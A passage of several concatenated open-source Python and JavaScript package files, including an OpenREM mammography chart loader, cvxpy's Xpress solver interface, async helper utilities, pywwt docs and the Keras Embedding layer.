) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__257b4267b536b6a5d1f74c438f324e6dbc44481b0e74180ddfd5c8320244dfa6(
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__0ef4eceb0778e45fdae434eed891e21283bc1e8c46cd7930766ebfde9e572700(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__ed8b59d5dbb9e882fe23132d2c7e972d43f5a359d4b8457dfa6c21e61d765789(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__45bdfde5e460a19bec6ffff65f82981de5cda8db2d0eee3a6abd99cb38525a89(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__a646989dbb801f28a47229a84b85b1c968d6ce35aa04707f5663ce01f12fe4e6(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__2141e235efa9d5afbbb2cffacb1f82d767f055d8247ae2c50059932b9acb4f3f(
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]],
) -> None:
"""Type checking stubs"""
pass
|
PypiClean
|
/OpenREM-1.0.0b1.tar.gz/OpenREM-1.0.0b1/openrem/remapp/static/js/charts/mgChartAjax.js
|
// Code to update the page and chart data on initial page load.
//
// Refactored: the original repeated the same "if the JSON key is present,
// write it into a div (and optionally append its CSV export link)" pattern
// 26 times. The mapping is now a data table walked by a single loop, so
// adding a chart means adding one entry. DOM update order matches the
// original table order exactly.
$(document).ready(function() {
    var requestData = arrayToURL(urlToArray(this.URL));

    // Each entry: key  - property expected in the AJAX JSON response
    //             div  - selector of the element receiving the chart HTML
    //             csv  - (optional) JSON property holding the CSV export
    //             csvDiv - (optional) selector that the CSV markup is appended to
    var chartMap = [
        // Acquisition frequency chart data
        {key: "acquisitionFrequencyData", div: "#acquisitionFrequencyChartDiv",
         csv: "acquisitionFrequencyDataCSV", csvDiv: "#acquisitionFrequencyChartParentDiv"},
        // AGD per acquisition chart data
        {key: "acquisitionMeanAGDData", div: "#acquisitionMeanAGDChartDiv",
         csv: "acquisitionMeanAGDDataCSV", csvDiv: "#acquisitionMeanAGDChartParentDiv"},
        {key: "acquisitionMedianAGDData", div: "#acquisitionMedianAGDChartDiv",
         csv: "acquisitionMedianAGDDataCSV", csvDiv: "#acquisitionMedianAGDChartParentDiv"},
        {key: "acquisitionBoxplotAGDData", div: "#acquisitionBoxplotAGDChartDiv"},
        {key: "acquisitionHistogramAGDData", div: "#acquisitionHistogramAGDChartDiv"},
        // AGD per acquisition grouped into compressed breast thickness bands
        {key: "meanAGDvsThickness", div: "#acquisitionMeanAGDvsThickChartDiv"},
        {key: "medianAGDvsThickness", div: "#acquisitionMedianAGDvsThickChartDiv"},
        // Study workload chart data
        {key: "studyWorkloadData", div: "#studyWorkloadChartDiv"},
        // AGD / kVp / mAs vs compressed thickness scatter plots
        {key: "AGDvsThickness", div: "#acquisitionScatterAGDvsThickChartDiv"},
        {key: "kVpvsThickness", div: "#acquisitionScatterkVpvsThickChartDiv"},
        {key: "mAsvsThickness", div: "#acquisitionScattermAsvsThickChartDiv"},
        // AGD over time chart data
        {key: "acquisitionMeanAGDOverTime", div: "#acquisitionMeanAGDOverTimeChartDiv"},
        {key: "acquisitionMedianAGDOverTime", div: "#acquisitionMedianAGDOverTimeChartDiv"},
        // Standard-name acquisition frequency chart data
        {key: "standardAcquisitionFrequencyData", div: "#standardAcquisitionFrequencyChartDiv",
         csv: "standardAcquisitionFrequencyDataCSV", csvDiv: "#standardAcquisitionFrequencyChartParentDiv"},
        // Standard-name AGD per acquisition chart data
        {key: "standardAcquisitionMeanAGDData", div: "#standardAcquisitionMeanAGDChartDiv",
         csv: "standardAcquisitionMeanAGDDataCSV", csvDiv: "#standardAcquisitionMeanAGDChartParentDiv"},
        {key: "standardAcquisitionMedianAGDData", div: "#standardAcquisitionMedianAGDChartDiv",
         csv: "standardAcquisitionMedianAGDDataCSV", csvDiv: "#standardAcquisitionMedianAGDChartParentDiv"},
        {key: "standardAcquisitionBoxplotAGDData", div: "#standardAcquisitionBoxplotAGDChartDiv"},
        {key: "standardAcquisitionHistogramAGDData", div: "#standardAcquisitionHistogramAGDChartDiv"},
        // Standard-name AGD grouped into compressed breast thickness bands
        {key: "standardMeanAGDvsThickness", div: "#standardAcquisitionMeanAGDvsThickChartDiv"},
        {key: "standardMedianAGDvsThickness", div: "#standardAcquisitionMedianAGDvsThickChartDiv"},
        // Standard-name AGD / kVp / mAs vs compressed thickness scatter plots
        {key: "standardAGDvsThickness", div: "#standardAcquisitionScatterAGDvsThickChartDiv"},
        {key: "standardkVpvsThickness", div: "#standardAcquisitionScatterkVpvsThickChartDiv"},
        {key: "standardmAsvsThickness", div: "#standardAcquisitionScattermAsvsThickChartDiv"},
        // Standard-name AGD over time chart data
        {key: "standardAcquisitionMeanAGDOverTime", div: "#standardAcquisitionMeanAGDOverTimeChartDiv"},
        {key: "standardAcquisitionMedianAGDOverTime", div: "#standardAcquisitionMedianAGDOverTimeChartDiv"},
        // Standard study name workload chart data
        {key: "standardStudyWorkloadData", div: "#standardStudyWorkloadChartDiv"}
    ];

    $(".ajax-progress").show();

    $.ajax({
        type: "GET",
        url: Urls.mg_summary_chart_data(),
        data: requestData,
        dataType: "json",
        success: function( json ) {
            chartMap.forEach(function (chart) {
                if (typeof json[chart.key] !== "undefined") {
                    $(chart.div).html(json[chart.key]);
                    // Some charts ship a CSV export alongside the HTML;
                    // append it to the parent container as before.
                    if (chart.csv) {
                        $(chart.csvDiv).append(json[chart.csv]);
                    }
                }
            });

            $(".ajax-progress").hide();
        },
        error: function( xhr, status, errorThrown ) {
            $(".ajax-progress").hide();
            $(".ajax-error").show();
            console.log( "Error: " + errorThrown );
            console.log( "Status: " + status );
            console.dir( xhr );
        }
    });
    return false;
});
|
PypiClean
|
/tyba_cvxpy-1.4.4-cp311-cp311-macosx_10_9_universal2.whl/cvxpy/reductions/solvers/conic_solvers/xpress_conif.py
|
import numpy as np
import cvxpy.settings as s
from cvxpy.constraints import SOC
from cvxpy.reductions.solution import Solution
from cvxpy.reductions.solvers import utilities
from cvxpy.reductions.solvers.conic_solvers.conic_solver import (
ConicSolver,
dims_to_solver_dict,
)
def makeMstart(A, n, ifCol: int = 1):
    """Build the cumulative start-index ("mstart") vector for matrix *A*.

    Counts the nonzeros of *A* per column (``ifCol=1``) or per row
    (``ifCol=0``), zero-pads the counts out to length *n*, and returns the
    running total prefixed with 0 — the CSC/CSR-style start pointers that
    the Xpress ``loadproblem``/``addrows`` calls expect.
    """
    counts = np.bincount(A.nonzero()[ifCol])
    # Pad with zeros for trailing empty columns/rows so len(result) == n + 1.
    tail = np.array([0] * (n - len(counts)), dtype=np.int64)
    head = np.array([0], dtype=np.int64)
    return np.cumsum(np.concatenate((head, counts, tail)))
class XPRESS(ConicSolver):
    """An interface for the Xpress solver.
    """

    # Class-wide bookkeeping: number of solves performed and the Xpress
    # version detected by import_solver() (-1 until then).
    solvecount = 0
    version = -1

    # Solver capabilities.
    MIP_CAPABLE = True
    SUPPORTED_CONSTRAINTS = ConicSolver.SUPPORTED_CONSTRAINTS + [SOC]
    MI_SUPPORTED_CONSTRAINTS = SUPPORTED_CONSTRAINTS

    def __init__(self) -> None:
        # Main member of this class: an Xpress problem. Marked with a
        # trailing "_" to denote a member
        self.prob_ = None

    def name(self):
        """The name of the solver.
        """
        return s.XPRESS

    def import_solver(self) -> None:
        """Imports the solver.
        """
        import xpress
        self.version = xpress.getversion()

    def accepts(self, problem) -> bool:
        """Can Xpress solve the problem?

        Requires an affine objective and only supported, affine-argument
        constraints.
        """
        # TODO check if is matrix stuffed.
        if not problem.objective.args[0].is_affine():
            return False
        for constr in problem.constraints:
            if type(constr) not in self.SUPPORTED_CONSTRAINTS:
                return False
            for arg in constr.args:
                if not arg.is_affine():
                    return False
        return True

    def apply(self, problem):
        """Returns a new problem and data for inverting the new solution.

        Returns
        -------
        tuple
            (dict of arguments needed for the solver, inverse data)
        """
        data, inv_data = super(XPRESS, self).apply(problem)
        variables = problem.x
        data[s.BOOL_IDX] = [int(t[0]) for t in variables.boolean_idx]
        data[s.INT_IDX] = [int(t[0]) for t in variables.integer_idx]
        # Treated as a MIP when any variable is boolean or integer.
        inv_data['is_mip'] = data[s.BOOL_IDX] or data[s.INT_IDX]
        return data, inv_data

    def invert(self, solution, inverse_data):
        """Returns the solution to the original problem given the inverse_data.

        Maps the raw solver output produced by solve_via_data() back onto the
        original problem's variables, duals (LP/SOCP only) and objective
        offset, and forwards IIS/solve-time diagnostics in ``attr``.
        """
        status = solution[s.STATUS]

        primal_vars = None
        dual_vars = None

        if status in s.SOLUTION_PRESENT:
            # Undo the constant objective offset removed during stuffing.
            opt_val = solution['getObjVal'] + inverse_data[s.OFFSET]
            primal_vars = {inverse_data[XPRESS.VAR_ID]: solution['primal']}
            if not inverse_data['is_mip']:
                # Duals are only meaningful for continuous problems.
                eq_dual = utilities.get_dual_values(
                    solution['eq_dual'],
                    utilities.extract_dual_value,
                    inverse_data[XPRESS.EQ_CONSTR])
                leq_dual = utilities.get_dual_values(
                    solution['ineq_dual'],
                    utilities.extract_dual_value,
                    inverse_data[XPRESS.NEQ_CONSTR])
                eq_dual.update(leq_dual)
                dual_vars = eq_dual
        else:
            if status == s.INFEASIBLE:
                opt_val = np.inf
            elif status == s.UNBOUNDED:
                opt_val = -np.inf
            else:
                opt_val = None

        # Solver-specific diagnostics passed through to the caller.
        other = {}
        other[s.XPRESS_IIS] = solution[s.XPRESS_IIS]
        other[s.XPRESS_TROW] = solution[s.XPRESS_TROW]
        other[s.SOLVE_TIME] = solution[s.SOLVE_TIME]
        return Solution(status, opt_val, primal_vars, dual_vars, other)

    def solve_via_data(self, data, warm_start: bool, verbose: bool, solver_opts, solver_cache=None):
        """Build an Xpress problem from the stuffed conic data and solve it.

        Loads the linear part with loadproblem(), marks discrete variables,
        adds one quadratic constraint per second-order cone, then solves and
        packages status/primal/dual/IIS information for invert().
        """
        import xpress as xp

        c = data[s.C]  # objective coefficients

        dims = dims_to_solver_dict(data[s.DIMS])  # contains number of columns, rows, etc.

        nrowsEQ = dims[s.EQ_DIM]
        nrowsLEQ = dims[s.LEQ_DIM]
        nrows = nrowsEQ + nrowsLEQ

        # linear constraints
        b = data[s.B][:nrows]  # right-hand side
        A = data[s.A][:nrows]  # coefficient matrix

        # Problem
        self.prob_ = xp.problem()

        mstart = makeMstart(A, len(c), 1)

        varGroups = {}  # If origprob is passed, used to tie IIS to original constraints
        transf2Orig = {}  # Ties transformation constraints to originals via varGroups
        nOrigVar = len(c)

        # Uses flat naming. Warning: this mixes
        # original with auxiliary variables.
        varnames = ['x_{0:05d}'.format(i) for i in range(len(c))]
        linRownames = ['lc_{0:05d}'.format(i) for i in range(len(b))]

        if verbose:
            self.prob_.controls.miplog = 2
            self.prob_.controls.lplog = 1
            self.prob_.controls.outputlog = 1
        else:
            self.prob_.controls.miplog = 0
            self.prob_.controls.lplog = 0
            self.prob_.controls.outputlog = 0
            self.prob_.controls.xslp_log = -1

        self.prob_.loadproblem(probname="CVX_xpress_conic",
                               # constraint types
                               qrtypes=['E'] * nrowsEQ + ['L'] * nrowsLEQ,
                               rhs=b,  # rhs
                               range=None,  # range
                               obj=c,  # obj coeff
                               mstart=mstart,  # mstart
                               mnel=None,  # mnel (unused)
                               # linear coefficients
                               mrwind=A.indices[A.data != 0],  # row indices
                               dmatval=A.data[A.data != 0],  # coefficients
                               dlb=[-xp.infinity] * len(c),  # lower bound
                               dub=[xp.infinity] * len(c),  # upper bound
                               colnames=varnames,  # column names
                               rownames=linRownames)  # row names

        # Set variable types for discrete variables
        self.prob_.chgcoltype(data[s.BOOL_IDX] + data[s.INT_IDX],
                              'B' * len(data[s.BOOL_IDX]) + 'I' * len(data[s.INT_IDX]))

        currow = nrows

        iCone = 0

        auxVars = set(range(nOrigVar, len(c)))

        # Conic constraints
        #
        # Quadratic objective and constraints fall in this category,
        # as all quadratic stuff is converted into a cone via a linear transformation
        for k in dims[s.SOC_DIM]:

            # k is the size of the i-th cone, where i is the index
            # within dims [s.SOC_DIM]. The cone variables in
            # CVXOPT, apparently, are separate variables that are
            # marked as conic but not shown in a cone explicitly.

            A = data[s.A][currow: currow + k].tocsr()
            b = data[s.B][currow: currow + k]
            currow += k

            # Create new (cone) variables and add them to the problem
            conevar = np.array([xp.var(name='cX{0:d}_{1:d}'.format(iCone, i),
                                       lb=-xp.infinity if i > 0 else 0)
                                for i in range(k)])

            self.prob_.addVariable(conevar)

            initrow = self.prob_.attributes.rows

            mstart = makeMstart(A, k, 0)

            trNames = ['linT_qc{0:d}_{1:d}'.format(iCone, i) for i in range(k)]

            # Linear transformation for cone variables <--> original variables
            self.prob_.addrows(['E'] * k,  # qrtypes
                               b,  # rhs
                               mstart,  # mstart
                               A.indices[A.data != 0],  # ind
                               A.data[A.data != 0],  # dmatval
                               names=trNames)  # row names

            self.prob_.chgmcoef([initrow + i for i in range(k)],
                                conevar, [1] * k)

            conename = 'cone_qc{0:d}'.format(iCone)
            # Real cone on the cone variables (if k == 1 there's no
            # need for this constraint as y**2 >= 0 is redundant)
            if k > 1:
                self.prob_.addConstraint(
                    xp.constraint(constraint=xp.Sum
                                  (conevar[i]**2 for i in range(1, k))
                                  <= conevar[0] ** 2,
                                  name=conename))

            auxInd = list(set(A.indices) & auxVars)

            if len(auxInd) > 0:
                group = varGroups[varnames[auxInd[0]]]
                for i in trNames:
                    transf2Orig[i] = group
                transf2Orig[conename] = group

            iCone += 1

        # End of the conditional (warm-start vs. no warm-start) code,
        # set options, solve, and report.

        # Set options
        #
        # The parameter solver_opts is a dictionary that contains only
        # one key, 'solver_opt', and its value is a dictionary
        # {'control': value}, matching perfectly the format used by
        # the Xpress Python interface.

        self.prob_.setControl({i: solver_opts[i] for i in solver_opts
                               if i in xp.controls.__dict__})

        # Tighten default tolerances unless the caller overrode them.
        if 'bargaptarget' not in solver_opts:
            self.prob_.controls.bargaptarget = 1e-30

        if 'feastol' not in solver_opts:
            self.prob_.controls.feastol = 1e-9

        # If option given, write file before solving
        if 'write_mps' in solver_opts:
            self.prob_.write(solver_opts['write_mps'])

        # Solve
        self.prob_.solve()

        results_dict = {
            'problem': self.prob_,
            'status': self.prob_.getProbStatus(),
            'obj_value': self.prob_.getObjVal(),
        }

        status_map_lp, status_map_mip = get_status_maps()

        # MIP and LP runs report status through different attribute spaces.
        if 'mip_' in self.prob_.getProbStatusString():
            status = status_map_mip[results_dict['status']]
        else:
            status = status_map_lp[results_dict['status']]

        results_dict[s.XPRESS_TROW] = transf2Orig

        results_dict[s.XPRESS_IIS] = None  # Return no IIS if problem is feasible

        if status in s.SOLUTION_PRESENT:
            results_dict['x'] = self.prob_.getSolution()
            if not (data[s.BOOL_IDX] or data[s.INT_IDX]):
                # CVXPY sign convention is the negative of Xpress' duals.
                results_dict['y'] = - np.array(self.prob_.getDual())
        elif status == s.INFEASIBLE and 'save_iis' in solver_opts and solver_opts['save_iis'] != 0:

            # Retrieve all IIS. For LPs there can be more than one,
            # but for QCQPs there is only support for one IIS.

            iisIndex = 0

            self.prob_.iisfirst(0)  # compute all IIS

            row, col, rtype, btype, duals, rdcs, isrows, icols = [], [], [], [], [], [], [], []

            self.prob_.getiisdata(0, row, col, rtype, btype, duals, rdcs, isrows, icols)

            origrow = []
            for iRow in row:
                # Report the original constraint name when the IIS row is one
                # of the cone-transformation rows added above.
                if iRow.name in transf2Orig:
                    name = transf2Orig[iRow.name]
                else:
                    name = iRow.name
                if name not in origrow:
                    origrow.append(name)

            results_dict[s.XPRESS_IIS] = [{'orig_row': origrow,
                                           'row': row,
                                           'col': col,
                                           'rtype': rtype,
                                           'btype': btype,
                                           'duals': duals,
                                           'redcost': rdcs,
                                           'isolrow': isrows,
                                           'isolcol': icols}]

            # save_iis < 0 means "save all"; otherwise stop at the cap.
            while self.prob_.iisnext() == 0 and (solver_opts['save_iis'] < 0 or
                                                 iisIndex < solver_opts['save_iis']):
                iisIndex += 1
                self.prob_.getiisdata(iisIndex,
                                      row, col, rtype, btype, duals, rdcs, isrows, icols)
                results_dict[s.XPRESS_IIS].append((
                    row, col, rtype, btype, duals, rdcs, isrows, icols))

        # Generate solution.
        solution = {}

        status_map_lp, status_map_mip = get_status_maps()

        if data[s.BOOL_IDX] or data[s.INT_IDX]:
            solution[s.STATUS] = status_map_mip[results_dict['status']]
        else:
            solution[s.STATUS] = status_map_lp[results_dict['status']]

        if solution[s.STATUS] in s.SOLUTION_PRESENT:
            solution[s.PRIMAL] = results_dict['x']
            solution[s.VALUE] = results_dict['obj_value']
            if not (data[s.BOOL_IDX] or data[s.INT_IDX]):
                # Split the dual vector back into equality/inequality parts.
                solution[s.EQ_DUAL] = results_dict['y'][0:dims[s.EQ_DIM]]
                solution[s.INEQ_DUAL] = results_dict['y'][dims[s.EQ_DIM]:]

        solution[s.XPRESS_IIS] = results_dict[s.XPRESS_IIS]
        solution[s.XPRESS_TROW] = results_dict[s.XPRESS_TROW]

        solution['getObjVal'] = self.prob_.getObjVal()
        solution[s.SOLVE_TIME] = self.prob_.attributes.time

        del self.prob_

        return solution
def get_status_maps():
    """Create status maps from Xpress to CVXPY.

    Returns a ``(lp_map, mip_map)`` pair of dictionaries translating Xpress
    LP and MIP status codes into CVXPY status constants.
    """
    import xpress as xp

    # Continuous (LP/QP) solve statuses.
    lp_map = {
        xp.lp_unstarted: s.SOLVER_ERROR,
        xp.lp_optimal: s.OPTIMAL,
        xp.lp_infeas: s.INFEASIBLE,
        xp.lp_cutoff: s.OPTIMAL_INACCURATE,
        xp.lp_unfinished: s.OPTIMAL_INACCURATE,
        xp.lp_unbounded: s.UNBOUNDED,
        xp.lp_cutoff_in_dual: s.OPTIMAL_INACCURATE,
        xp.lp_unsolved: s.OPTIMAL_INACCURATE,
        xp.lp_nonconvex: s.SOLVER_ERROR,
    }

    # Mixed-integer solve statuses.
    mip_map = {
        xp.mip_not_loaded: s.SOLVER_ERROR,
        xp.mip_lp_not_optimal: s.SOLVER_ERROR,
        xp.mip_lp_optimal: s.SOLVER_ERROR,
        xp.mip_no_sol_found: s.SOLVER_ERROR,
        xp.mip_solution: s.OPTIMAL_INACCURATE,
        xp.mip_infeas: s.INFEASIBLE,
        xp.mip_optimal: s.OPTIMAL,
        xp.mip_unbounded: s.UNBOUNDED,
    }

    return (lp_map, mip_map)
|
PypiClean
|
/pywwt-0.21.0.tar.gz/pywwt-0.21.0/docs/api/pywwt.Polygon.rst
|
Polygon
=======
.. currentmodule:: pywwt
.. autoclass:: Polygon
:show-inheritance:
.. rubric:: Attributes Summary
.. autosummary::
~Polygon.fill
~Polygon.fill_color
~Polygon.line_color
~Polygon.line_width
~Polygon.shape
.. rubric:: Methods Summary
.. autosummary::
~Polygon.add_point
.. rubric:: Attributes Documentation
.. autoattribute:: fill
.. autoattribute:: fill_color
.. autoattribute:: line_color
.. autoattribute:: line_width
.. autoattribute:: shape
.. rubric:: Methods Documentation
.. automethod:: add_point
|
PypiClean
|
/hotpot_km-0.2.2.tar.gz/hotpot_km-0.2.2/hotpot_km/async_utils.py
|
import asyncio
import sys
import inspect
from typing import Callable, Awaitable, Any, Union
# Store the original tornado.conucrrent.Future, as it will likely be patched later
try:
import tornado.concurrent
_orig_tc_future = tornado.concurrent.Future
except ImportError:
_orig_tc_future = None
async def wait_before(delay, aw):
    """Sleep for *delay* seconds, then await *aw* and return its result."""
    await asyncio.sleep(delay)
    result = await aw
    return result
async def await_then_kill(km, aw_id):
    """Await *aw_id* to obtain a kernel id, then shut that kernel down on *km*."""
    kernel_id = await aw_id
    return await km.shutdown_kernel(kernel_id)
def ensure_event_loop():
    """Return the current asyncio event loop, creating and installing one
    if none is set for this thread.
    """
    try:
        return asyncio.get_event_loop()
    except RuntimeError:
        # No current loop in this thread: make one and register it.
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        return loop
def check_ipython() -> None:
    """Raise RuntimeError if an IPython older than 7.0.0 is already imported.

    nest_asyncio-based reentrancy (see just_run) needs IPython >= 7.
    """
    # original from vaex/asyncio.py
    IPython = sys.modules.get("IPython")
    if not IPython:
        # IPython not imported at all: nothing to check.
        return
    version_tuple = tuple(int(part) for part in IPython.__version__.split("."))  # type: ignore
    if version_tuple < (7, 0, 0):
        raise RuntimeError(
            f"You are using IPython {IPython.__version__} "  # type: ignore
            "while we require 7.0.0+, please update IPython"
        )
def check_patch_tornado() -> None:
    """If tornado is imported, add the patched asyncio.Future to its tuple of acceptable Futures"""
    # original from vaex/asyncio.py
    if "tornado" not in sys.modules:
        return
    import tornado.concurrent  # type: ignore
    if asyncio.Future not in tornado.concurrent.FUTURES:
        tornado.concurrent.FUTURES = tornado.concurrent.FUTURES + (asyncio.Future,)  # type: ignore
def just_run(coro: Awaitable) -> Any:
    """Make the coroutine run, even if there is an event loop running (using nest_asyncio)"""
    # Non-awaitables pass straight through unchanged.
    if not inspect.isawaitable(coro):
        return coro
    # Old-style tornado Futures (captured at import time, before any
    # patching) must be converted to asyncio futures first.
    if _orig_tc_future and isinstance(coro, _orig_tc_future):
        import tornado.platform.asyncio
        coro = tornado.platform.asyncio.to_asyncio_future(coro)
    # original from vaex/asyncio.py
    # NOTE(review): asyncio._get_running_loop() is a private API; the public
    # get_running_loop() raises instead of returning None — confirm before
    # migrating.
    loop = asyncio._get_running_loop()
    if loop is None:
        had_running_loop = False
        try:
            loop = asyncio.get_event_loop()
        except RuntimeError:
            # we can still get 'There is no current event loop in ...'
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
    else:
        had_running_loop = True
    if had_running_loop:
        # if there is a running loop, we patch using nest_asyncio
        # to have reentrant event loops
        check_ipython()
        import nest_asyncio
        nest_asyncio.apply()
        check_patch_tornado()
    # Blocks until the coroutine completes and returns its result.
    return loop.run_until_complete(coro)
def run_sync(coro: Callable) -> Callable:
    """Runs a coroutine and blocks until it has executed.

    An event loop is created if no one already exists. If an event loop is
    already running, this event loop execution is nested into the already
    running one if `nest_asyncio` is set to True.

    Parameters
    ----------
    coro : coroutine
        The coroutine to be executed.

    Returns
    -------
    result :
        Whatever the coroutine returns.
    """
    # Local import keeps this module's top-level imports unchanged.
    from functools import wraps

    # functools.wraps copies __doc__ (as the hand-written version did) and
    # additionally __name__, __qualname__, __module__ and __wrapped__, so the
    # wrapper introspects like the wrapped coroutine function.
    @wraps(coro)
    def wrapped(*args, **kwargs):
        return just_run(coro(*args, **kwargs))

    return wrapped
async def ensure_async(obj: Union[Awaitable, Any]) -> Any:
    """Convert a non-awaitable object to a coroutine if needed,
    and await it if it was not already awaited.
    """
    if not inspect.isawaitable(obj):
        # Plain value: nothing to await, hand it back as-is.
        return obj
    try:
        return await obj
    except RuntimeError as e:
        if str(e) != "cannot reuse already awaited coroutine":
            raise
        # obj is already the coroutine's result
        return obj
|
PypiClean
|
/mis_modulos-0.1.tar.gz/mis_modulos-0.1/keras/layers/core/embedding.py
|
import tensorflow.compat.v2 as tf
from keras import backend
from keras import constraints
from keras import initializers
from keras import regularizers
from keras.dtensor import utils
from keras.engine import base_layer_utils
from keras.engine.base_layer import Layer
from keras.utils import tf_utils
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.Embedding")
class Embedding(Layer):
    """Turns positive integers (indexes) into dense vectors of fixed size.

    e.g. `[[4], [20]] -> [[0.25, 0.1], [0.6, -0.2]]`

    This layer can only be used on positive integer inputs of a fixed range. The
    `tf.keras.layers.TextVectorization`, `tf.keras.layers.StringLookup`,
    and `tf.keras.layers.IntegerLookup` preprocessing layers can help prepare
    inputs for an `Embedding` layer.

    This layer accepts `tf.Tensor` and `tf.RaggedTensor` inputs. It cannot be
    called with `tf.SparseTensor` input.

    Example:

    >>> model = tf.keras.Sequential()
    >>> model.add(tf.keras.layers.Embedding(1000, 64, input_length=10))
    >>> # The model will take as input an integer matrix of size (batch,
    >>> # input_length), and the largest integer (i.e. word index) in the input
    >>> # should be no larger than 999 (vocabulary size).
    >>> # Now model.output_shape is (None, 10, 64), where `None` is the batch
    >>> # dimension.
    >>> input_array = np.random.randint(1000, size=(32, 10))
    >>> model.compile('rmsprop', 'mse')
    >>> output_array = model.predict(input_array)
    >>> print(output_array.shape)
    (32, 10, 64)

    Args:
      input_dim: Integer. Size of the vocabulary,
        i.e. maximum integer index + 1.
      output_dim: Integer. Dimension of the dense embedding.
      embeddings_initializer: Initializer for the `embeddings`
        matrix (see `keras.initializers`).
      embeddings_regularizer: Regularizer function applied to
        the `embeddings` matrix (see `keras.regularizers`).
      embeddings_constraint: Constraint function applied to
        the `embeddings` matrix (see `keras.constraints`).
      mask_zero: Boolean, whether or not the input value 0 is a special
        "padding" value that should be masked out. This is useful when using
        recurrent layers which may take variable length input. If this is
        `True`, then all subsequent layers in the model need to support masking
        or an exception will be raised. If mask_zero is set to True, as a
        consequence, index 0 cannot be used in the vocabulary (input_dim should
        equal size of vocabulary + 1).
      input_length: Length of input sequences, when it is constant.
        This argument is required if you are going to connect
        `Flatten` then `Dense` layers upstream
        (without it, the shape of the dense outputs cannot be computed).

    Input shape:
      2D tensor with shape: `(batch_size, input_length)`.

    Output shape:
      3D tensor with shape: `(batch_size, input_length, output_dim)`.

    **Note on variable placement:**
    By default, if a GPU is available, the embedding matrix will be placed on
    the GPU. This achieves the best performance, but it might cause issues:

    - You may be using an optimizer that does not support sparse GPU kernels.
    In this case you will see an error upon training your model.
    - Your embedding matrix may be too large to fit on your GPU. In this case
    you will see an Out Of Memory (OOM) error.

    In such cases, you should place the embedding matrix on the CPU memory.
    You can do so with a device scope, as such:

    ```python
    with tf.device('cpu:0'):
      embedding_layer = Embedding(...)
      embedding_layer.build()
    ```

    The pre-built `embedding_layer` instance can then be added to a `Sequential`
    model (e.g. `model.add(embedding_layer)`), called in a Functional model
    (e.g. `x = embedding_layer(x)`), or used in a subclassed model.
    """

    @utils.allow_initializer_layout
    def __init__(
        self,
        input_dim,
        output_dim,
        embeddings_initializer="uniform",
        embeddings_regularizer=None,
        activity_regularizer=None,
        embeddings_constraint=None,
        mask_zero=False,
        input_length=None,
        **kwargs,
    ):
        # Default the declared input shape from input_length when the caller
        # did not give one explicitly.
        if "input_shape" not in kwargs:
            if input_length:
                kwargs["input_shape"] = (input_length,)
            else:
                kwargs["input_shape"] = (None,)
        if input_dim <= 0 or output_dim <= 0:
            raise ValueError(
                "Both `input_dim` and `output_dim` should be positive, "
                f"Received input_dim = {input_dim} "
                f"and output_dim = {output_dim}"
            )
        if (
            not base_layer_utils.v2_dtype_behavior_enabled()
            and "dtype" not in kwargs
        ):
            # In TF1, the dtype defaults to the input dtype which is typically
            # int32, so explicitly set it to floatx
            kwargs["dtype"] = backend.floatx()
        # We set autocast to False, as we do not want to cast floating- point
        # inputs to self.dtype. In call(), we cast to int32, and casting to
        # self.dtype before casting to int32 might cause the int32 values to be
        # different due to a loss of precision.
        kwargs["autocast"] = False
        super().__init__(**kwargs)

        self.input_dim = input_dim
        self.output_dim = output_dim
        self.embeddings_initializer = initializers.get(embeddings_initializer)
        self.embeddings_regularizer = regularizers.get(embeddings_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        self.embeddings_constraint = constraints.get(embeddings_constraint)
        self.mask_zero = mask_zero
        self.supports_masking = mask_zero
        self.input_length = input_length

    @tf_utils.shape_type_conversion
    def build(self, input_shape=None):
        """Create the (input_dim, output_dim) embedding weight matrix."""
        self.embeddings = self.add_weight(
            shape=(self.input_dim, self.output_dim),
            initializer=self.embeddings_initializer,
            name="embeddings",
            regularizer=self.embeddings_regularizer,
            constraint=self.embeddings_constraint,
            experimental_autocast=False,
        )
        self.built = True

    def compute_mask(self, inputs, mask=None):
        """Mask out positions equal to 0 when `mask_zero` is enabled."""
        if not self.mask_zero:
            return None
        return tf.not_equal(inputs, 0)

    @tf_utils.shape_type_conversion
    def compute_output_shape(self, input_shape):
        """Append `output_dim`, validating against `input_length` if set."""
        if self.input_length is None:
            return input_shape + (self.output_dim,)
        else:
            # input_length can be tuple if input is 3D or higher
            if isinstance(self.input_length, (list, tuple)):
                in_lens = list(self.input_length)
            else:
                in_lens = [self.input_length]
            if len(in_lens) != len(input_shape) - 1:
                raise ValueError(
                    f'"input_length" is {self.input_length}, but received '
                    f"input has shape {input_shape}"
                )
            else:
                for i, (s1, s2) in enumerate(zip(in_lens, input_shape[1:])):
                    if s1 is not None and s2 is not None and s1 != s2:
                        raise ValueError(
                            f'"input_length" is {self.input_length}, but '
                            f"received input has shape {input_shape}"
                        )
                    elif s1 is None:
                        # Fill unknown declared lengths from the actual shape.
                        in_lens[i] = s2
            return (input_shape[0],) + tuple(in_lens) + (self.output_dim,)

    def call(self, inputs):
        """Look up `inputs` (cast to int32 if needed) in the embedding table."""
        dtype = backend.dtype(inputs)
        if dtype != "int32" and dtype != "int64":
            inputs = tf.cast(inputs, "int32")
        out = tf.nn.embedding_lookup(self.embeddings, inputs)
        if (
            self._dtype_policy.compute_dtype
            != self._dtype_policy.variable_dtype
        ):
            # Instead of casting the variable as in most layers, cast the
            # output, as this is mathematically equivalent but is faster.
            out = tf.cast(out, self._dtype_policy.compute_dtype)
        return out

    def get_config(self):
        """Return the serializable layer configuration."""
        config = {
            "input_dim": self.input_dim,
            "output_dim": self.output_dim,
            "embeddings_initializer": initializers.serialize(
                self.embeddings_initializer
            ),
            "embeddings_regularizer": regularizers.serialize(
                self.embeddings_regularizer
            ),
            "activity_regularizer": regularizers.serialize(
                self.activity_regularizer
            ),
